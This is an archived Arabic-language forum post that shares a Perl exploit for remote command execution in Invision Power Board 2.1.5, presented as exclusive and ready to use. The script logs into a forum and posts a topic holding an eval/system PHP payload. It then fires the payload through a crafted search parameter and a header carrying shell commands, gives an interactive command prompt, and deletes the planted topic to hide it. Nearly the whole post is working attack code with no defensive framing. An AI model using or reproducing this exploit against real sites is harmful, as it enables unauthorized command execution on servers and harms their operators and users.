|
||||||
| أرشيف المنتدى هنا نقل الموضوعات المكررة والروابط التى لا تعمل |
|
|
أدوات الموضوع | ابحث في الموضوع | انواع عرض الموضوع |
|
#1
03-05-2006, 10:52 PM
|
||||
|
||||
السلام عليكم
حصريا على ثانويه لاول مره على المنتدايات العربيه هذه الثغره ثغره منتدايات Invision Power Board v2.1.5 مع الاستغلال الكود كود:
[COLOR=red]#!/usr/bin/perl[/COLOR] # Wed Apr 26 16:44:15 CEST 2006 jolascoaga at 514.es #[COLOR=purple]X x _ Y O U R I™ _ x X[/COLOR] # INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept # # remote command execution. vuln credits goes to IceShaman. # # works only if you have perms to post a comment. Exploit with replye is # in my TODO... #www.ELOSTAZ.com # 514 still r0xing. # !dSR the hardc0re hax0rs;) # There is no kwel comments in this release, wait for next upgrade #######################################################################/ use LWP::UserAgent; use HTTP::Cookies; use LWP::Simple; use HTTP::Request::Common "POST"; use HTTP::Response; use Getopt::Long; use strict; $| = 1; #;1 = |$ my ($proxy,$proxy_user,$proxy_pass,$lang); my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var); my ($md5_key, $post_key, $tmp_var); my %lang_es = ( * * * 'name' => 'Spanish Language', * * * 'login' => "Ahora est s identificado", * * * 'incorrect' => "Nombre de usuario o contrase a incorrectos", * * * 'deleted' => "Tema Eliminado" ); my %lang_en = ( * * * 'name' => 'English language', * * * 'login' => "You are now logged in", * * * 'incorrect' => "Sorry, we could not find a member using those log in details", * * * 'deleted' => 'Topic Deleted', ); my %lang_strings = (); my $ua = new LWP::UserAgent( * * * * * cookie_jar=> { file => "$$.cookie" }); my $options = GetOptions ( 'host=s' => \$arg_host, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'ipb_user=s' => \$ipb_user, 'ipb_pass=s' => \$ipb_pass, 'lang=s' => \$lang, 'errors' => \$errors, 'debug' => \$debug); my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/; print "Host: $host\nForum Index: $forum_index\n" if $debug; &help unless ($host); # w0w0w0w0w0 is smarter than some one i know :D if (!$lang) { * * * lang_autodetect(); * * * print "Detected lang is: $lang_strings{'name'}\n" if $debug; } while (1){ * print "invvy:\\> "; * my $cmd = <STDIN>; * &invvy($cmd); } sub invvy { * * * chomp (my $cmd = shift); * * * LWP::Debug::level('+') if $debug; * * * $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"); * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * ipb_login (); # This works with redirects enabled/disabled * * * ipb_post(); # Post in a main forum. * * * ipb_exec ($cmd); * * * ipb_delete ($forum_index, $topic_index); } # guglucitos team presents: sub help { * print "Syntax: ./$0 <url> [options]\n"; * print "\t--ipb_user, --ipb_pass (needed if dont allow anonymous posts)\n"; * print "\t--proxy (http), --proxy_user, --proxy_pass\n"; * print "\t--lang=[es|en] (default: autodetect)\n"; * print "\t--debug\n"; * print "\nExample\n"; * print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n"; * print "\n"; * exit(1); } # sponsorized by coca-cola sub lang_autodetect { * my $req = HTTP::Request->new (GET => $host."/index.php"); * $ua->proxy(['http'] => $proxy) if $proxy; * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * print $req->as_string() if $debug; * my $res = $ua->request($req); * my $html = $res->content(); * if (($html =~ /Bienvenido,/) or ($html =~ /Fecha y Hora actual/)) { * * * * * * * %lang_strings = %lang_es; * * * * * * * return; * } * if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) { * * * * * * * %lang_strings = %lang_en; * * * * * * * return; * } * print "Unknown lang switching to default: 'english'\n"; * %lang_strings = %lang_en; } # login function for 2.1.5 sub ipb_login { * * * my $content; * * * my $h = $host."/index.php?act=Login&CODE=01"; * * * print $h . "\n" if $debug; * * * my $req = POST $h,[ * * * * * * * 'referer' => $host, * * * * * * * 'UserName' => $ipb_user, * * * * * * * 'PassWord' => $ipb_pass, * * * * * * * 'CookieDate' => 1 * * * * * * * ]; #grab these, and send to dsr! * * * print $req->as_string() if $debug; * * * my $res = $ua->request($req); * * * if ($errors) { * * * * * * * print "[+] Context: Login in\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n"; * * * } * * * if ($res->code() eq 302) { * * * * * * * $content = redirect ($res->header("Location")); * * * } else { * * * * * * * $content = $res->content(); * * * } * * * if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) { * * * * * print "Logged in\n" if $errors; * * * } else { * * * * *die "Can't log in\n"; * * * } } sub redirect { * my ($addr) = @_; * my $req = HTTP::Request->new (GET => $addr); * $ua->proxy(['http'] => $proxy) if $proxy; * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * print $req->as_string() if $debug; # MKSINK is r0xer * my $res = $ua->request($req); * my $html = $res->content(); * return $html; } sub ipb_post { * * * # This is for posting into a main index. * * * my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index; * * * my $req = HTTP::Request->new (GET => $h); * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * print $req->as_string() if $debug; #dirty_epic r0x++ * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * ($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/; * * * ($post_key) = $html =~ m/post_key' value='(.*?)'/; * * * print "AUTH check: $md5_key\n" if $debug; * * * print "POST key: $post_key\n" if $debug; * * * $tmp_var = int(rand(31337)); * * * my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei * * * $h = $host."/index.php"; * * * print $h."\n" if $debug; * * * my $req = POST $h, [ * * * * * * * 'st' => 0, * * * * * * * 'act' => "Post", * * * * * * * 's' => '', * * * * * * * 'f' => $forum_index, * * * * * * * 'auth_key' => $md5_key, * * * * * * * 'removeattachid' => 0, * * * * * * * 'MAX_FILE_SIZE' => 51200000, * * * * * * * 'CODE' => '01', * * * * * * * 'post_key' => $post_key, * * * * * * * 'TopicTitle' => '514 pwned', * * * * * * * 'TopicDesc' => '', * * * * * * * 'poll_question' => '', * * * * * * * 'ffont' => 0, * * * * * * * 'fsize' => 0, * * * * * * * 'Post' => $exploitme, * * * * * * * 'post_htmlstatus' => 0, * * * * * * * 'enableemo' => 'yes', * * * * * * * 'enablesig' => 'yes', * * * * * * * 'mod_options' => 'nowt', * * * * * * * 'iconid' => 0, * * * * * * * 'dosubmit' => 'Post New Topic' * * * * * * * ]; * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * print $req->as_string() if $debug; * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * print "Location: ".$res->header("Location") if $debug; * * * ($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/; * * * if ($errors) { * * * * * * * print "[+] Context: Creating post\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; * * * } } sub ipb_delete { * * * my ($fid, $tid) = @_; * * * my $req; * * * print "Deleting Topic: $tid from forum: $fid\n" if $debug; * * * my $h = $host."/index.php"; * * * $req = POST $h, [ * * * * * * * * * * * 'st' => 0, * * * * * * * * * * * 'act' => 'mod', * * * * * * * * * * * 'f' => $fid, * * * * * * * * * * * 'auth_key' => $md5_key, * * * * * * * * * * * 'CODE' => '08', * * * * * * * * * * * 't' => $tid, * * * * * * * * * * * 'submit' => 'Delete this topic' * * * * * * * ]; # **** windows automatic reboot * * * print $req->as_string() if $debug; * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * my $res = $ua->request($req); * * * if ($errors) { * * * * * * * print "[+] Context: Deleting Topic\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n"; * * * } * * * # yow yow * * * if ($res->code() eq 200) { * * * * * * * *if ($res->content() =~ /$lang_strings{'deleted'}/) { * * * * * * * * * * * print "Topic $topic_index deleted\n" if $errors; * * * * * * * } else { * * * * * * * * * * * print "Maybe there was errors deleting post: $topic_index\n" if $errors; * * * * * * * } * * * } } # shhhhh this is hidden sub ipb_exec { * * * my ($cmd) = @_; * * * my $h = $host."/index.php?act=Search&CODE=01"; * * * my $req = POST $h, [ * * * * * * * * * * * 'keywords' => "HTTP_".$tmp_var, * * * * * * * * * * * 'namesearch' => '', * * * * * * * * * * * 'forums[]' => $forum_index, * * * * * * * * * * * 'prune' => 0, * * * * * * * * * * * 'prune_type' => 'newer', * * * * * * * * * * * 'result_type' => 'posts', * * * * * * * * * * * 'search_in' => 'posts', * * * * * * * * * * * 'sort_key' => 'last_post', * * * * * * * * * * * 'searchsubs' => '1' * * * * * * * ]; * * * print $req->as_string() if $debug; * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/; * * * print "Redirect to: $redir\n" if $errors; # don't ask * * * if ($errors) { * * * * * * * print "[+] Context: First search\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; * * * } * * * if ($res->code eq 302) { * * * * * * * $redir = $res->header("Location"); * * * } * * * # piere - tonite is a great song * * * my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00'); * * * $ua->proxy(['http'] => $proxy) if $proxy; * * * $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL'); * * * $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; * * * print $req->as_string() if $debug; * * * my $res = $ua->request($req); * * * my $html = $res->content(); * * * $html =~ m/STARTXPL(.*?)ENDXPL/s; * * * print $1."\n"; * * * # no matter with you * * * if ($errors) { * * * * * * * print "[+] Context: Executed\n"; * * * * * * * print "HTTP Error code: ".$res->code()."\n"; * * * * * * * print "HTTP Location: ".$res->header("Location")."\n"; * * * * * * * print "Topic Index: ".$topic_index."\n"; * * * * * * * my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; * * * * * * * print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; * * * } } لاستغلالها من نظام الوويندوز لازم يكون عندك برنامج ActivePerl سلام واى استفسار انا موجود . Y O U R I ™ Z 0n1
__________________
Nobody gets too much heaven no more, itz much harder to come by Nobody gets too much love no more, But I ..:: ^^ Youri <33's Jaleesz ^^ ::.. * quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she 
|
| العلامات المرجعية |
«
الموضوع السابق
|
الموضوع التالي
»
العرض الشجري
|
|
جميع الأوقات بتوقيت GMT +2. الساعة الآن 08:47 PM.
